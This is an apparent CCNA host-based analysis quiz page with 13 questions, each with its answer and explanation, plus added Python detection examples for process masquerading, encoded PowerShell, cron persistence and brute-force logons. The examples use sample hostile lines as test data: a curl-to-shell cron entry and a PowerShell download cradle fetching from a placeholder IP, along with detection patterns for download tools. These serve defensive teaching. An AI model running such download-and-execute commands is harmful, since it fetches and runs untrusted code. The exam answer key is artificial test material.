CCNA Host-Based Analysis Questions

46 questions · Host-Based Analysis · All types, answers revealed

1
MCQ · easy

Which Windows registry hive contains user-specific configuration settings that can be modified by applications?

A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_USERS
Answer: C

HKCU stores per-user configuration.

Why this answer

HKEY_CURRENT_USER (HKCU) is the correct answer because it stores user-specific configuration settings, such as desktop preferences, environment variables, and application settings, that are loaded from the NTUSER.DAT file when a user logs in. Applications modify this hive to persist per-user customizations, making it the primary location for user-level registry changes.

Exam trap

The trap here is that candidates confuse HKEY_CURRENT_USER with HKEY_LOCAL_MACHINE, assuming all configuration settings are system-wide, but Cisco tests the distinction that per-user application settings are stored in HKCU, not HKLM.

How to eliminate wrong answers

Option A is wrong because HKEY_CLASSES_ROOT (HKCR) stores file association and COM class registration data, not user-specific application settings. Option B is wrong because HKEY_LOCAL_MACHINE (HKLM) contains system-wide configuration settings that apply to all users and require administrative privileges to modify, not per-user settings. Option D is wrong because HKEY_USERS (HKU) contains all loaded user hives on the system, but applications typically write to the current user's hive via HKCU, which is a symbolic link to the specific user's subkey under HKU; direct modification of HKU is uncommon for application settings.

2
MCQ · hard

Based on the exhibit, what does the sequence of events indicate?

A.The wmiprvse.exe process is known to spawn svchost.exe for system health checks.
B.A process masquerading as svchost.exe was spawned by wmiprvse.exe (likely via WMI), and then that malicious process launched calc.exe, a suspicious behavior.
C.The user is executing a macro that opens Calculator.
D.A legitimate system process (wmiprvse.exe) launched a service host, which then launched calc.exe for maintenance.
Answer: B

The path and subsequent execution of calc.exe indicate malicious activity.

Why this answer

The exhibit shows wmiprvse.exe (the WMI Provider Host) spawning svchost.exe, which then launches calc.exe. In normal operation wmiprvse.exe does not spawn svchost.exe: the genuine svchost.exe lives in C:\Windows\System32 and is started by services.exe. A binary named svchost.exe with a different parent, or running from another path, is masquerading. The sequence indicates that an attacker used WMI (for example the Win32_Process.Create method) to run a malicious binary named svchost.exe, which then launched calc.exe as a stand-in payload. When validating this on a live host, compare the image path and parent of every svchost.exe instance against that baseline rather than trusting the name.

This is a classic indicator of remote execution or lateral movement via WMI (MITRE ATT&CK T1047).

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate and that wmiprvse.exe only spawns itself or system processes, when in fact attackers can use WMI to launch arbitrary executables with a misleading name.

How to eliminate wrong answers

Option A is wrong because wmiprvse.exe does not spawn svchost.exe for system health checks; svchost.exe is started by services.exe, and WMI does not initiate such a process for health monitoring. Option C is wrong because the exhibit shows a process chain (wmiprvse.exe → svchost.exe → calc.exe), not a user directly executing a macro; macros typically run within an Office application, not via WMI and svchost.exe. Option D is wrong because a legitimate system process (wmiprvse.exe) does not launch svchost.exe for maintenance; svchost.exe is a service host, not a maintenance tool, and calc.exe is not a standard maintenance binary.
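As an added example (not part of the page or of Cisco's exam material), the check described above applied to Sysmon Event ID 1 records rather than to an exhibit: rebuild the process ancestry and flag any process that carries a system binary's name but has the wrong parent or runs from the wrong directory. The records and paths are constructed to mirror the exhibit; the EXPECTED allowlist is an assumption you would extend from your own baseline.

```python
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    """One Sysmon Event ID 1 record, reduced to the fields the check needs."""
    pid: int
    ppid: int
    image: str          # Image: full path of the new process
    parent_image: str   # ParentImage: full path of the creator


# Who normally starts a few well-known system binaries, and where they live.
# Deliberately strict allowlist (assumption); extend it from your own baseline,
# e.g. with SysWOW64 paths where 32-bit hosts are expected.
EXPECTED = {
    "svchost.exe":  ("services.exe", r"c:\windows\system32"),
    "wmiprvse.exe": ("svchost.exe",  r"c:\windows\system32\wbem"),
    "lsass.exe":    ("wininit.exe",  r"c:\windows\system32"),
}

# Constructed sample mirroring the exhibit: WmiPrvSE -> fake svchost -> calc,
# plus one genuine svchost.exe started by services.exe for contrast.
SAMPLE_EVENTS = [
    ProcEvent(600, 400, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(700, 600, r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent(800, 700, r"C:\Windows\System32\calc.exe",
              r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe"),
    ProcEvent(900, 500, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\services.exe"),
]


def basename(path):
    return ntpath.basename(path).lower()


def masquerade_findings(events):
    """Return [(pid, [reason, ...])] for processes named like a system binary
    but started by the wrong parent or from the wrong directory."""
    findings = []
    for ev in events:
        name = basename(ev.image)
        if name not in EXPECTED:
            continue
        want_parent, want_dir = EXPECTED[name]
        reasons = []
        if basename(ev.parent_image) != want_parent:
            reasons.append(f"parent is {basename(ev.parent_image)}, expected {want_parent}")
        if ntpath.dirname(ev.image).lower() != want_dir:
            reasons.append(f"image path {ev.image} is outside {want_dir}")
        if reasons:
            findings.append((ev.pid, reasons))
    return findings


def ancestry(events, pid):
    """Image-name chain from the oldest known ancestor down to pid."""
    by_pid = {ev.pid: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, reasons in masquerade_findings(SAMPLE_EVENTS):
        print(pid, " -> ".join(ancestry(SAMPLE_EVENTS, pid)), reasons)
```

The parent check and the path check are independent on purpose: a renamed binary dropped into System32 fails only the first, an attacker-controlled copy in a temp directory fails both, and a genuine svchost.exe passes both.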

3
MCQ · hard

A security analyst is reviewing host-based logs from a compromised system. The Windows Security Event Log shows multiple Event ID 4625 (failed logon) from a single source IP, but no successful logon. The network team confirms that IP is a known scanning host. What is the most likely explanation for the lack of successful logon events?

A.The brute-force attack did not succeed in gaining access
B.The logon type was interactive, which is not recorded by Event ID 4625
C.The attacker successfully logged in but the logs were deleted by the attacker
D.The attacker used a pass-the-hash technique that bypasses logon events
Answer: A

Failed logons without success indicate the attacker did not compromise the account.

Why this answer

Event ID 4625 specifically records failed logon attempts. The absence of a corresponding Event ID 4624 (successful logon) from the same source IP indicates that none of the authentication attempts succeeded. Since the network team confirms the IP belongs to a known scanning host, the most likely explanation is that the brute-force attack failed to guess valid credentials.

Exam trap

Cisco often tests the misconception that a lack of successful logon events means the logs were tampered with or that certain attack types bypass logging. In fact, multiple 4625 events with no matching 4624 from the same source is the expected signature of a failed brute-force attempt, provided the audit policy records logon failures and there is no Event ID 1102 (audit log cleared) in the same window.

How to eliminate wrong answers

Option B is wrong because Event ID 4625 records all failed logon attempts regardless of logon type, including interactive, network, and remote logon types; the logon type is a field within the event, not a filter for whether the event is generated. Option C is wrong because while an attacker could delete logs after a successful login, the question explicitly states the logs show multiple Event ID 4625 events but no successful logon events; if logs were deleted, the 4625 events would likely also be missing, or the deletion would be evident via Event ID 1102 (log clear). Option D is wrong because pass-the-hash attacks still generate Windows Security Event Log entries; a successful pass-the-hash logon produces Event ID 4624 on the target with Logon Type 3 (network) and NTLM as the authentication package, and tools that inject the hash into a new logon session on the source host produce a 4624 there with Logon Type 9 (new credentials). Neither bypasses logon event generation.

4
MCQ · hard

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A.Examine the Windows Registry for Run keys to identify persistence mechanisms.
B.Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
C.Review prefetch files (.pf) to determine when PowerShell was last executed.
D.Analyze network connection logs to identify outbound connections to known malicious IPs.
Answer: B

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

Why this answer

PowerShell operational logs, specifically Event ID 4104 (Script Block Logging) in the Microsoft-Windows-PowerShell/Operational channel, capture the full text of PowerShell scripts and commands executed on the system. Since the analyst suspects the attacker used PowerShell to download additional tools, parsing these logs is the most direct and efficient first step to confirm that activity. This log source provides the actual commands run, including any download commands like Invoke-WebRequest or Start-BitsTransfer, without relying on indirect artifacts. Because the logged text is the script after PowerShell has decoded it, a -EncodedCommand payload appears here in plain text. Two caveats for practice: the log is complete only when Script Block Logging is enabled by policy (PowerShell 5 and later still record blocks they consider suspicious when it is off), so confirm the policy state before treating an empty result as proof of absence, and the operational log can be cleared or can wrap, so prefetch and the memory dump remain useful corroboration.

Exam trap

Cisco often tests the distinction between artifacts that show execution (prefetch, registry) versus artifacts that capture the actual command or script content (PowerShell operational logs), leading candidates to choose a less direct indicator like prefetch files.

How to eliminate wrong answers

Option A is wrong because examining Windows Registry Run keys focuses on persistence mechanisms (e.g., programs that start automatically), not on identifying whether PowerShell was used to download tools during the incident. Option C is wrong because prefetch files (.pf) only show that PowerShell.exe was launched and when, but they do not reveal the specific commands or scripts executed, so they cannot confirm tool downloads. Option D is wrong because analyzing network connection logs may show outbound connections but does not directly prove PowerShell was the method used; the attacker could have used other tools or protocols, and logs may be incomplete or not capture encrypted traffic.

5
MCQ · medium

A security analyst wants to monitor file creation events on a critical Windows server without installing additional software. Which Windows audit policy should be configured?

A.Audit Detailed Tracking
B.Audit File System
C.Audit Account Logon
D.Audit Process Creation
Answer: B

Audit File System logs file system operations like create, write, delete.

Why this answer

Audit File System policy is the correct choice because it specifically enables auditing of file creation, modification, and deletion events on NTFS volumes. By configuring this policy under Advanced Audit Policy in Windows, the security analyst can monitor file creation events on the critical server without requiring any third-party software, as the events are logged to the Windows Security log with Event ID 4663 (an attempt was made to access an object). The policy alone produces nothing: a system access control list (SACL) must also be set on the directory or files of interest, for example through the folder's Auditing tab or icacls, naming the principals and access types (such as "Create files / write data") to record. Without the SACL, 4663 events are not generated.

Exam trap

Cisco often tests the distinction between 'Audit File System' (file-level operations) and 'Audit Detailed Tracking' (process-level operations), causing candidates to confuse file creation with process creation events.

How to eliminate wrong answers

Option A is wrong because Audit Detailed Tracking focuses on process creation, termination, and handle duplication events (e.g., Event ID 4688), not file creation events. Option C is wrong because Audit Account Logon monitors credential validation against a domain controller or the local SAM (e.g., Event ID 4776 for NTLM and 4768/4769 for Kerberos), not file system operations. Option D is wrong because Audit Process Creation, a subcategory of Detailed Tracking, logs when a process is created or starts (Event ID 4688), which does not capture file creation events on the file system.

6
MCQ · hard

An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?

A.PowerShell-based malware using encoded commands to evade detection
B.Privilege escalation attempt
C.Process hollowing attack
D.Phishing email attachment
Answer: A

Encoded commands are a common obfuscation technique in PowerShell attacks.

Why this answer

Event ID 1 with a signed parent process and an unsigned child using 'powershell -EncodedCommand' strongly indicates PowerShell-based malware. The argument is Base64 over the UTF-16LE bytes of the script, so attackers use it to hide keywords from simple string matching; PowerShell decodes and runs the payload at runtime. Legitimate automation and some management agents also use -EncodedCommand, so the analyst should decode the argument and judge the content rather than alerting on the flag alone.

Exam trap

Cisco often tests the distinction between execution indicators (like encoded PowerShell commands) and other attack stages (like privilege escalation or process hollowing), leading candidates to confuse a common obfuscation technique with a different attack type.

How to eliminate wrong answers

Option B is wrong because privilege escalation typically involves exploiting vulnerabilities to gain higher privileges, not simply executing an encoded PowerShell command from a signed parent. Option C is wrong because process hollowing replaces the memory of a legitimate process with malicious code, which would not manifest as a child process with an encoded PowerShell command. Option D is wrong because a phishing email attachment is a delivery vector, not a direct threat indicator; the Sysmon log shows execution, not the initial infection method.
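An added example, not from the original page, covering this question and question 4: decode a -EncodedCommand argument the way PowerShell does (Base64 over UTF-16LE) and scan the resulting text for the download cmdlets and methods named above. The same scanner applies unchanged to the ScriptBlockText of Event ID 4104, which already holds the decoded script. The command line and URL are constructed; the indicator list is an assumption to extend from your own detections.

```python
import base64
import re

# Patterns that typically mark a download cradle; matched case-insensitively
# against the decoded script. The labels are what the scanner returns.
# (Assumed starting list, not an exhaustive one.)
DOWNLOAD_INDICATORS = [
    ("Invoke-WebRequest",   re.compile(r"\b(invoke-webrequest|iwr)\b", re.I)),
    ("Invoke-RestMethod",   re.compile(r"\b(invoke-restmethod|irm)\b", re.I)),
    ("Start-BitsTransfer",  re.compile(r"\bstart-bitstransfer\b", re.I)),
    ("WebClient download",  re.compile(r"\.download(string|file|data)\s*\(", re.I)),
    ("certutil -urlcache",  re.compile(r"\bcertutil\b.*-urlcache", re.I)),
    ("bitsadmin /transfer", re.compile(r"\bbitsadmin\b.*/transfer", re.I)),
]

# powershell.exe accepts -EncodedCommand, its documented short forms -e and -ec,
# and any unambiguous prefix; these are the spellings commonly seen.
_ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script):
    """Build the -EncodedCommand argument exactly as PowerShell expects it:
    Base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the decoded script if the command line carries an encoded
    command, otherwise None. Malformed Base64 or odd byte counts yield None."""
    m = _ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def download_indicators(script_text):
    """Labels of download cradles present in a script block (a decoded command
    line or the ScriptBlockText of a 4104 event)."""
    return [label for label, pattern in DOWNLOAD_INDICATORS if pattern.search(script_text)]


# Constructed sample: what a Sysmon Event ID 1 CommandLine field might carry.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT)


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_CMDLINE)
    print(decoded)
    print(download_indicators(decoded))
```

Decoding with the UTF-16LE codec matters: treating the bytes as UTF-8 produces text interleaved with NUL characters, and substring rules then miss every keyword.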

7
MCQ · easy

A security analyst is investigating a suspected malware infection on a Windows host. The analyst wants to identify processes that have network connections. Which built-in Windows tool should the analyst use?

A.netstat
B.ipconfig
C.tasklist
D.nslookup
Answer: A

netstat shows active connections and listening ports with associated process IDs.

Why this answer

Netstat (network statistics) is the correct built-in Windows tool for displaying active TCP and UDP connections, listening ports, and the associated process IDs (PIDs). The `-o` flag adds the owning PID to each line and `-b` (which requires an elevated prompt) adds the executable name; combined with `-a` (all sockets, including listeners) and `-n` (numeric addresses, no DNS lookups) as `netstat -anob`, the analyst can map each network connection to its owning process, which is essential for identifying suspicious processes communicating over the network.

Exam trap

Cisco often tests the distinction between tools that show process lists (tasklist) and tools that show network connections (netstat), trapping candidates who confuse 'process enumeration' with 'network connection enumeration'.

How to eliminate wrong answers

Option B (ipconfig) is wrong because it displays IP configuration details such as IP address, subnet mask, and default gateway, but it does not show active network connections or the processes using them. Option C (tasklist) is wrong because it lists running processes and their memory usage, but it does not reveal which processes have open network sockets or connections. Option D (nslookup) is wrong because it is a DNS query tool used to resolve domain names to IP addresses or perform reverse lookups, and it provides no information about local processes or their network connections.

8
Multi-Select · hard

Which TWO locations in a Linux filesystem should be checked for evidence of malware persistence?

Select 2 answers
A./proc
B./var/spool/cron/crontabs
C./var/log/syslog
D./etc/init.d
E./etc/passwd
Answers: B, D

Cron jobs can run malware periodically.

Why this answer

Option B is correct because cron is a standard Linux mechanism for scheduling recurring tasks, and malware often uses cron jobs to re-execute itself after a reboot or at specific intervals. The crontabs directory under /var/spool/cron/ contains the actual cron job files for each user, making it a primary location to check for unauthorized persistence entries. Malware can add a cron entry that downloads or runs a malicious script, ensuring its continued presence on the system.

Option D is correct because /etc/init.d holds SysV-style init scripts that run at boot (systemd hosts still execute them through compatibility generators), so a dropped or modified script there starts malware on every restart. Locations that deserve the same check are /etc/crontab, /etc/cron.d, the /etc/cron.hourly, daily, weekly and monthly directories, the systemd unit directories (/etc/systemd/system and ~/.config/systemd/user), and per-user shell startup files such as ~/.bashrc.

Exam trap

Cisco often tests the distinction between locations that store persistent configuration (like crontabs and init.d) versus runtime or log-only directories (like /proc and /var/log), so candidates mistakenly choose /proc or /var/log/syslog because they are commonly examined during live analysis, but they do not hold persistence artifacts.
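An added example, not from the original page: a parser for crontab files like those under /var/spool/cron/crontabs (and, with system=True, the /etc/crontab and /etc/cron.d layout that adds a user column), flagging entries that download and pipe into a shell, run from memory-backed or world-writable directories, or use @reboot. The crontab text and URL are constructed; the heuristics are assumptions to extend.

```python
import re

# Constructed crontab as found under /var/spool/cron/crontabs/<user>:
# five schedule fields, then the command; no user column.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.5/x.sh | sh
@reboot /dev/shm/.cache/run >/dev/null 2>&1
30 4 * * 1 /home/jdoe/backup.sh
"""

# Heuristics (assumptions): download piped straight into a shell, and
# directories that are world-writable or memory-backed, where droppers stage files.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text, system=False):
    """Yield (line_no, schedule, user, command). system=True parses the
    /etc/crontab and /etc/cron.d layout, which carries a user column."""
    for no, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        # skip blank lines, comments and VAR=value environment lines
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*=", s):
            continue
        n_sched = 1 if s.startswith("@") else 5      # @reboot etc. are one field
        parts = s.split(None, n_sched + (1 if system else 0))
        if len(parts) < n_sched + (2 if system else 1):
            continue                                  # malformed; cron would reject it too
        schedule = " ".join(parts[:n_sched])
        user = parts[n_sched] if system else None
        yield no, schedule, user, parts[-1]


def suspicious_cron_entries(text, system=False):
    """Return [(line_no, command, [reason, ...])] for entries worth a look."""
    findings = []
    for no, schedule, _user, command in parse_crontab(text, system):
        reasons = []
        if DOWNLOAD_EXEC.search(command):
            reasons.append("downloads and pipes into a shell")
        if any(d in command for d in VOLATILE_DIRS):
            reasons.append("runs from a world-writable or memory-backed directory")
        if schedule == "@reboot":
            reasons.append("@reboot entry re-runs after every restart; confirm it is expected")
        if reasons:
            findings.append((no, command, reasons))
    return findings


if __name__ == "__main__":
    for no, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {no}: {command}\n    {'; '.join(reasons)}")
```

Run the same function over each file in /var/spool/cron/crontabs and, with system=True, over /etc/crontab and /etc/cron.d/*; the column layout is the only difference between the two formats.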

9
MCQ · medium

A company uses Microsoft Windows Event Logging for host monitoring. The security team receives an alert from a Windows 10 workstation 'WS-102' indicating multiple failed logon attempts (Event ID 4625) within a short period from an internal IP address 10.10.10.50, followed by a successful logon (Event ID 4624) for user 'jdoe'. Shortly after, Event ID 4688 (Process Creation) shows 'cmd.exe' started by 'explorer.exe' with a command line launching 'powershell.exe -EncodedCommand ...'. The encoded command decodes to a script that attempts to download a payload from a remote server. The analyst needs to determine the most effective immediate response to limit lateral movement and impact.

A.Restore WS-102 from a known good backup and ignore the alert as a false positive.
B.Immediately reset the password for user 'jdoe', block outbound traffic to the remote server at the firewall, and initiate an incident response process.
C.Run a full antivirus scan on WS-102 and isolate it.
D.Disable the user account 'jdoe' and investigate the source IP 10.10.10.50.
Answer: B

Resets credentials, stops C2 communication, and begins formal response.

Why this answer

Option B is correct because the sequence of events—brute-force logon attempts followed by a successful logon and then an encoded PowerShell command attempting to download a payload—indicates a confirmed compromise. Resetting the password for 'jdoe' immediately revokes the attacker's authenticated access, blocking outbound traffic to the remote server prevents the payload download and C2 communication, and initiating incident response ensures proper containment and investigation. This combination directly limits lateral movement by cutting off the attacker's credentials and network egress.

Exam trap

Cisco often tests the distinction between reactive steps (like scanning or disabling accounts) and proactive containment actions that immediately cut off the attacker's access and communication channels, leading candidates to choose a less effective response that does not address both credential compromise and network egress.

How to eliminate wrong answers

Option A is wrong because restoring from backup ignores the active compromise and fails to contain the threat; the alert is not a false positive given the clear indicators of attack (failed logons, successful logon, encoded PowerShell download). Option C is wrong because running a full antivirus scan is a slow, passive step that does not immediately stop the attacker's access or the ongoing download; isolation alone does not revoke the compromised credentials or block the outbound connection to the remote server. Option D is wrong because disabling only the user account 'jdoe' does not block the outbound traffic to the remote server, allowing the payload download to complete; investigating the source IP is important but not the most effective immediate response to limit lateral movement.
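As an added example (not from the original page), a classifier over Security-log extracts that serves both this question and question 3: per source IP it reports a burst of 4625 events with no following 4624 as a failed brute force, and a burst followed within the window by a 4624 from the same source as a possible compromise. The records are constructed; the threshold and window are assumptions to tune against your own logon volume.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED, SUCCESS = 4625, 4624

# Constructed Security-log extracts: (timestamp, event_id, source_ip, account).
SAMPLE_EVENTS = [(datetime(2024, 5, 1, 9, 0, s), FAILED, "198.51.100.7", "administrator")
                 for s in range(0, 40, 5)]                     # scanner: 8 failures, no success
SAMPLE_EVENTS += [(datetime(2024, 5, 1, 9, 10, s), FAILED, "10.10.10.50", "jdoe")
                  for s in range(0, 30, 5)]                    # WS-102 case: 6 failures ...
SAMPLE_EVENTS += [(datetime(2024, 5, 1, 9, 10, 31), SUCCESS, "10.10.10.50", "jdoe")]   # ... then success
SAMPLE_EVENTS += [(datetime(2024, 5, 1, 9, 20, 0), FAILED, "10.10.10.20", "asmith"),    # one typo,
                  (datetime(2024, 5, 1, 9, 20, 9), SUCCESS, "10.10.10.20", "asmith")]   # then a normal logon


def classify_sources(events, threshold=5, window=timedelta(minutes=10)):
    """Per source IP, return one of:
      'failed-brute-force'  - >= threshold 4625 inside window, no 4624 within window after the burst
      'possible-compromise' - such a burst followed by a 4624 from the same source
      'normal'              - anything else
    """
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_ip[ev[2]].append(ev)

    verdicts = {}
    for ip, evs in by_ip.items():
        failures = []      # timestamps of recent 4625s from this source
        burst_at = None    # time the failure count first crossed the threshold
        verdict = "normal"
        for when, event_id, _ip, _account in evs:
            failures = [t for t in failures if when - t <= window]   # age out old failures
            if event_id == FAILED:
                failures.append(when)
                if len(failures) >= threshold and burst_at is None:
                    burst_at = when
            elif event_id == SUCCESS and burst_at is not None and when - burst_at <= window:
                verdict = "possible-compromise"
                break
        if verdict == "normal" and burst_at is not None:
            verdict = "failed-brute-force"
        verdicts[ip] = verdict
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_EVENTS).items():
        print(f"{ip:16} {verdict}")
```

A single 4625 before a 4624 is the normal mistyped-password pattern and stays below the threshold; only a burst followed by success earns the compromise verdict that justifies the credential reset and egress block chosen in option B.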

10
MCQ · medium

A host-based analysis tool reports that a file has a digital signature that is valid but from an untrusted publisher. What should the analyst interpret from this?

A.The file is definitely malicious because the publisher is untrusted
B.The file's signature was revoked
C.The file may be malicious or legitimate; further analysis is needed
D.The file is definitely safe because the signature is valid
Answer: C

The signature chain is technically valid, but the publisher is not trusted by default. Requires contextual analysis.

Why this answer

A valid digital signature confirms the file has not been tampered with since signing, but it does not guarantee the publisher is trustworthy. An untrusted publisher means the certificate chain does not terminate at a root CA in the system's Trusted Root Certification Authorities store, or the signer has been placed in the Untrusted Certificates store by policy, so the file could be either legitimate (e.g., from a new or self-signed publisher) or malicious (e.g., signed with a stolen certificate). Therefore, further analysis, such as checking the file's hash reputation, behavior, or origin and inspecting the certificate's subject, issuer and validity period, is required to determine its safety.

Exam trap

Cisco often tests the distinction between signature validity (cryptographic integrity) and publisher trust (certificate chain trust), leading candidates to mistakenly equate a valid signature with safety or an untrusted publisher with guaranteed malice.

How to eliminate wrong answers

Option A is wrong because a valid signature from an untrusted publisher does not automatically mean the file is malicious; the publisher may simply not be in the trusted store (e.g., a self-signed certificate). Option B is wrong because a revoked signature would be reported as invalid, not as valid but from an untrusted publisher; revocation is checked via CRL or OCSP and would cause the signature to fail verification. Option D is wrong because a valid signature does not imply safety; the publisher could be malicious or compromised, and the signature only ensures integrity, not trustworthiness.

11
Matching · medium

Match each log severity level to its description (syslog).

Pairings

Emergency (0): System is unusable
Alert (1): Immediate action required
Critical (2): Critical conditions
Error (3): Error conditions
Warning (4): Warning conditions

Why these pairings

Syslog severity levels range from 0 (Emergency) to 7 (Debug); the levels not shown above are Notice (5), Informational (6) and Debug (7). The numeric value is what travels in a message's PRI field, so a lower number means a more severe condition.
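An added example, not from the page: decode the <PRI> prefix that carries facility and severity on the wire, which is how a collector recovers the level from a raw syslog line, and filter to the levels that need action. The sample lines are constructed.

```python
import re

# Severity 0-7 and facility 0-23 as numbered in RFC 5424; names follow
# common syslogd usage (13-15 are log audit, log alert and clock daemon).
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "security", "console", "solaris-cron",
              "local0", "local1", "local2", "local3", "local4", "local5", "local6", "local7"]

_PRI = re.compile(r"^<(\d{1,3})>")


def decode_pri(line):
    """Split the leading <PRI> into (facility, severity, severity_number).
    PRI = facility * 8 + severity, so the low three bits carry the severity."""
    m = _PRI.match(line)
    if not m:
        raise ValueError("no <PRI> prefix")
    pri = int(m.group(1))
    if pri > 191:                        # 23 * 8 + 7 is the largest legal value
        raise ValueError(f"PRI {pri} out of range")
    facility, severity = divmod(pri, 8)
    return FACILITIES[facility], SEVERITIES[severity], severity


def needs_action(lines, max_severity=3):
    """Messages at Error (3) or worse by default; Emergency is 0."""
    return [ln for ln in lines if decode_pri(ln)[2] <= max_severity]


# Constructed lines: two in the BSD (RFC 3164) layout, one in the RFC 5424 layout.
SAMPLE_LINES = [
    "<34>Oct 11 22:14:15 srv1 su: 'su root' failed for jdoe on /dev/pts/1",
    "<13>Oct 11 22:14:16 srv1 sshd[2042]: Accepted publickey for jdoe",
    "<0>Oct 11 22:15:00 srv1 kernel: Kernel panic - not syncing",
    "<165>1 2024-05-01T09:00:00Z srv1 app - - - scheduled job finished",
]


if __name__ == "__main__":
    for ln in SAMPLE_LINES:
        print(decode_pri(ln), ln[:40])
```

The severity is the remainder after dividing by 8, which is why a filter on "level 3 or lower" cannot be done on the raw PRI value (34 and 165 are both notice-or-worse in different facilities) without decoding it first.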

12
MCQ · easy

A financial firm uses Sysmon for endpoint monitoring on all Windows servers. One server, 'FIN-SRV-01', which hosts a critical database application, is exhibiting high CPU usage and unusual outbound network connections to a known malicious IP on port 8080. The Sysmon logs show Event ID 1 (Process Create) with a suspicious process 'rundll32.exe' spawned from 'winword.exe', and Event ID 3 (Network Connect) showing the connection to the malicious IP. The antivirus has not detected any threats. The analyst must decide the next immediate action to contain the threat while preserving evidence.

A.Reboot the server to clear any suspicious processes from memory.
B.Immediately format the server's hard drive and reinstall the OS.
C.Restore the server from the most recent backup taken yesterday.
D.Isolate the server by disconnecting its network cable and taking a memory dump for further analysis.
Answer: D

Preserves evidence and stops malicious activity.

Why this answer

Option D is correct because isolating the server by disconnecting its network cable immediately stops the outbound communication to the malicious IP on port 8080, containing the threat without destroying volatile evidence. Taking a memory dump preserves the running processes, including the suspicious rundll32.exe spawned from winword.exe, which is critical for forensic analysis of the attack chain. This approach aligns with incident response best practices: contain first, then analyze, while avoiding actions that could destroy evidence or alert the attacker.

Exam trap

Cisco often tests the principle that containment must preserve evidence, and the trap here is that candidates may choose a destructive action like rebooting or formatting, mistakenly thinking it removes the threat, when in fact it destroys the forensic data needed to understand the attack.

How to eliminate wrong answers

Option A is wrong because rebooting the server would clear the memory, destroying volatile evidence such as the running rundll32.exe process and any network connections, and would not remove the underlying persistence mechanism. Option B is wrong because immediately formatting the hard drive destroys all evidence, including logs, artifacts, and the root cause, making forensic analysis impossible and potentially violating legal or compliance requirements. Option C is wrong because restoring from a backup taken yesterday could reintroduce the same vulnerability or malware if the infection occurred before the backup, and it does not address the immediate need to stop the active outbound connection to the malicious IP.

13
MCQ · medium

An analyst is investigating a host that is suspected of being compromised. She runs the 'netstat -anb' command and sees an established connection to an unknown IP address on port 4444. The associated process is svchost.exe. Which conclusion is MOST appropriate?

A.The host is definitely compromised because svchost.exe should not make outbound connections.
B.The host may be infected with malware that is injecting code into svchost.exe.
C.The analyst should immediately kill the svchost.exe process.
D.The connection is legitimate because svchost.exe is a critical Windows process.
Answer: B

Malware often injects into svchost.exe to hide its network activity.

Why this answer

Option B is correct because svchost.exe is a legitimate Windows service host process, but it is a common target for malware that uses process injection or DLL sideloading to hide malicious network activity. The established connection to an unknown IP on port 4444 (the default listener port of Metasploit and a common choice for backdoors) indicates the process may be hosting injected code, not that svchost.exe itself is inherently malicious. Before concluding anything, the analyst should confirm the image path of that PID (it should be C:\Windows\System32\svchost.exe, started by services.exe), run `tasklist /svc` to see which services the PID claims to host, and check whether any of them legitimately talks to that destination; a PID that hosts no service, or a path outside System32, turns suspicion into evidence.

Exam trap

Cisco often tests the misconception that svchost.exe never makes outbound connections, when in fact many Windows services (e.g., BITS, Windows Update) do; the trap is assuming any outbound connection from a critical process is automatically legitimate or automatically malicious without considering the port and context.

How to eliminate wrong answers

Option A is wrong because svchost.exe can make legitimate outbound connections for Windows services like DNS, DHCP, or Windows Update, so an outbound connection alone does not prove compromise. Option C is wrong because killing svchost.exe could crash critical system services and disrupt the investigation; the analyst should first capture memory and network artifacts to identify the injected code. Option D is wrong because while svchost.exe is a critical Windows process, an established connection to an unknown IP on port 4444 is highly suspicious and should not be dismissed as legitimate without further analysis.

14
Drag & Drop · medium

